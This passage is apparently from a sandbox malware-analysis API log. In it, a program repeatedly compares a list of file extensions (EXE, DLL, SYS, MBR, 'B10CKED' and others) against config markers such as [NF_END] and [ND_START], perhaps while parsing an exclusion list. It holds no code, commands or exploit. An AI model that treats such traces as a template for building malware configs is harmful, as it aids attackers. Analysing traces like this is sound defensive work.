lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 
[0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0100.889] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] 
